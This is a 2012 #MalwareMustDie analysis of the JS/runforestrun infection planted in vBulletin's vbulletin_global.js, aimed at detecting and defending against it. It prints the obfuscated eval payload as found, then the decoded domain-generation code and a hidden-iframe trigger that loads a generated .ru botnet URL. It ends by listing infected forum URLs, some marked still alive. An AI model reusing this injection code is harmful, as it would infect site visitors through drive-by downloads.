===================================================================================== #MalwareMustDie Mon Oct 8 04:19:36 JST 2012 Infections of Pseudorandom are aiming at vBulletin scripts/patches.. especially patches that were not well-attended when installed, an easy target for infector code injection ===================================================================================== -------------------------------------------------------------------------------------- Fact/Background: -------------------------------------------------------------------------------------- 0. vBulletin Forum is often installed w/ the well-attended WebApps security & targeted for malware infections. 1. i.e. vBulletin (Forum, CMS++) released a patch to 3.6.8 to fix a security issue reported within the WYSIWYG editor for Firefox↓ https://www.vbulletin.com/forum/showthread.php/247739-vBulletin-3-6-8-Patch-Level-2-Released 2. The patch itself, named "vbulletin_global.js", was mentioned as not to be redistributed in whole or in significant part. And this patch file was the latest one found injected in some sites. -------------------------------------------------------------------------------------- Infections sighted in some sites, one example is as follows: -------------------------------------------------------------------------------------- Date: Mon Oct 8 04:03:30 JST 2012 --04:03:38-- http://24rs.org/forums/clientscript/vbulletin_global.js => `vbulletin_global.js' Resolving 24rs.org... 24.106.10.35 Connecting to 24rs.org|24.106.10.35|:80... connected. HTTP request sent, awaiting response... 
200 OK Length: 51,352 (50K) [application/x-javascript] 04:03:40 (56.66 KB/s) - `vbulletin_global.js' saved [51352/51352] -------------------------------------------------------------------------------------- Injected with the malicious code at line 1951 (last line of orig script) as per below: //*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,630,575,276,575,606,505,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,696,505,690,580,192,305,192,580,624,525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,492,160,252,160,624,525,354,50,192,160,192,160,630,510,240,580,606,575,696,160,372,160,288,205,738,50,192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,505,600,160,366,160,696,505,690,580,354,50,192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,160,696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,660,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,615,60,160,192,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,200,702,550,630,600,252,245,288,240,288,205,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,230,618,505,696,360,666,585,684,575,240,205,192,310,1
92,245,300,160,378,160,294,160,348,160,288,295,60,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,306,260,318,270,330,280,342,240,294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,600,420,350,420,350,420,350,246,160,258,160,240,500,276,515,606,580,408,485,696,505,240,205,192,210,192,240,720,350,420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,350,420,205,246,295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,160,192,160,192,580,624,525,690,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,160,192,160,696,520,630,575,276,405,192,305,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,410,192,305,192,580,624,525,690,230,462,160,222,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,660,505,474,590,606,570,462,160,366,160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,520,630,575,276,550,606,600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192,160,192,160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,684,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,462,485,720,205,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,600,200,240,385,582,600,270,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,630,550,246,295,60,625,60,50,612,585,660,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,648,505,660,515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192,590,582,570,192,570,582,550,600,160,366,160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,6
84,200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,575,192,305,192,455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,234,515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,234,220,234,545,234,220,234,550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,580,234,220,234,585,234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,465,354,50,192,160,192,160,708,485,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,684,200,708,485,684,160,630,160,366,160,288,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,192,215,258,160,246,615,60,160,192,160,192,160,192,160,192,575,696,570,192,215,366,160,648,505,696,580,606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468,585,654,490,606,570,240,570,582,550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520,192,225,192,245,246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,215,192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,240,510,702,550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,192,160,192,160,630,510,240,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,366,160,204,585,660,500,606,510,630,550,606,500,204,205,738,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,192,160,192,590,582,570,192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,160,408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,160,708,485,684,160,600,555,654,485,630,550,468,485,654,505,192,305
,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,294,270,264,160,234,570,702,195,246,295,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,160,366,160,600,555,594,585,654,505,660,580,276,495,684,505,582,580,606,345,648,505,654,505,660,580,240,170,438,350,492,325,462,345,204,205,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,505,696,325,696,580,684,525,588,585,696,505,240,170,690,570,594,170,264,160,204,520,696,580,672,290,282,235,204,215,600,555,654,485,630,550,468,485,654,505,258,170,282,570,702,550,612,555,684,505,690,580,684,585,660,315,690,525,600,305,588,555,696,550,606,580,300,170,246,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,545,276,575,696,605,648,505,276,595,630,500,696,520,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,624,505,630,515,624,580,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} /*qhk6sa6g1c*/ -------------------------------------------------------------------------------------- if you crack this correctly this is the currently back to epidemic the JS/runforestrun Pseudorandom as per example cracked in MalwareMustDie.blogspot.com last post. 
PoC: --------------------------------------------------------------------------------------
// Analyst notes: per the writeup above, this is the decoded form of the numeric array
// appended to the served vbulletin_global.js between the marker comments
// /*km0ae9gr6m*/ and /*qhk6sa6g1c*/. The decoder loop at the end of that blob takes
// each array element, divides it by 5 (even index) or 6 (odd index), and feeds the
// result to String.fromCharCode, then passes the text to window["eval"]; the first
// elements (510,702,550,594,...) decode to "function nextRandomNumber(", matching
// what follows. The code below is reproduced as found; only comments were added.

/**
 * One step of the seed generator used to pick the domain letters.
 * Reads this.seed, this.Q, this.A, this.R, this.M and this.oneOverM (all set in
 * RandomNumberGenerator) and advances this.seed in place.
 * The hi/lo split with Q and R has the shape of Schrage's method for the MINSTD
 * LCG (A = 48271, M = 2^31-1), but nothing here truncates hi or lo to an integer
 * and this.Q itself is the non-integer M / A, so the state evolves in IEEE double
 * arithmetic rather than as the exact integer LCG. A detection-side
 * re-implementation (e.g. to pre-compute a given day's domains for blocking or
 * sinkholing) must reproduce this same double arithmetic, not the textbook version.
 * @returns {number} the new this.seed scaled by this.oneOverM (1/M)
 */
function nextRandomNumber(){
  var hi = this.seed / this.Q;            // plain float division, no Math.floor
  var lo = this.seed % this.Q;            // float remainder against a non-integer Q
  var test = this.A * lo - this.R * hi;
  if(test > 0){ this.seed = test; } else { this.seed = test + this.M; }
  return (this.seed * this.oneOverM);
}

/**
 * Constructor for the seed generator.
 * @param {number} unix  POSIX timestamp in seconds (the trigger below passes
 *                       Math.round(+new Date()/1000), i.e. the victim's clock)
 * The seed depends only on the local-time month (0-based), day of month and a
 * half-day flag (s = 1 when getHours() > 12, i.e. 13:00-23:59 local time). The year,
 * minutes and seconds are never used, so the generated domain is the same for every
 * victim in the same timezone for half a day and the schedule repeats every year.
 * A = 48271 and M = 2147483647 (2^31-1) are the MINSTD constants; Q = M / A is left
 * as a fraction (see nextRandomNumber).
 */
function RandomNumberGenerator(unix){
  var d = new Date(unix*1000);
  var s = d.getHours() > 12 ? 1 : 0;      // getHours/getMonth/getDate are local time, not UTC
  this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
  this.A = 48271;
  this.M = 2147483647;
  this.Q = this.M / this.A;               // non-integer: 2147483647 / 48271
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
  this.next = nextRandomNumber;
  return this;
}

/**
 * Maps one generator output onto an index.
 * @param {RandomNumberGenerator} r  generator; r.next() is consumed once per call
 * @param {number} Min
 * @param {number} Max  endpoints of the target range (called below with 0 and 25)
 * @returns {number} Math.round((Max-Min) * r.next() + Min); lies in Min..Max as long
 *                   as r.next() stays within [0, 1] — not verified here
 */
function createRandomNumber(r, Min, Max){ return Math.round((Max-Min) * r.next() + Min); }

/**
 * The DGA proper: `length` letters drawn from a-z via the seeded generator, then '.'
 * and `zone`. Called below as generatePseudoRandomString(unix, 16, 'ru'), so the
 * network indicator is a 16-letter, all-lowercase .ru hostname.
 * @param {number} unix    seconds timestamp forwarded to RandomNumberGenerator
 * @param {number} length  number of letters in the label
 * @param {string} zone    TLD appended after the dot
 * @returns {string} the generated hostname
 */
function generatePseudoRandomString(unix, length, zone){
  var rand = new RandomNumberGenerator(unix);
  var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
  var str = '';
  for(var i = 0; i < length; i ++ ){ str += letters[createRandomNumber(rand, 0, letters.length - 1)]; }
  return str + '.' + zone;
}

// Payload trigger: 500 ms after the script runs, and only once per page (global flag
// iframeWasCreated), inject a zero-size hidden IFRAME whose src is
// http://<16 letters>.ru/runforestrun?sid=botnet2. `ifrm` is assigned without var
// (implicit global on window) and the empty catch(e){} drops any exception, so a
// failed injection leaves no error visible on the page.
// Detection hooks visible here: the request path "/runforestrun" with query
// "sid=botnet2", a 0px x 0px IFRAME with visibility:hidden appended to document.body,
// and the window globals iframeWasCreated / ifrm.
setTimeout(function(){
  try{
    if(typeof iframeWasCreated == "undefined"){
      iframeWasCreated = true;
      var unix = Math.round(+new Date()/1000);   // current time in seconds from the victim's clock
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
    }
  }catch(e){}
}, 500);
-------------------------------------------------------------------------------------- vBulletin attcked sites in history less than 2 weeks: -------------------------------------------------------------------------------------- http://25fev.vuzforum.ru/--ms-forum/clientscript/vbulletin_md5.js?v=385 [Still Alive] http://www.pribaltica.info/clientscript/vbulletin_thrdpostlist.js?v=380 [Still Alive] http://pribaltica.info/clientscript/vbulletin_thrdpostlist.js?v=380 [Closed/hanled] http://b-static.net/vbulletin/images/custom/beta2/buttons [Closed/hanled] http://www.boards.ie/vbulletin/showthread.php?p=80832999#post80832999 [Closed/hanled] -------------------------------------------------------------------------------------- #MalwareMustDie!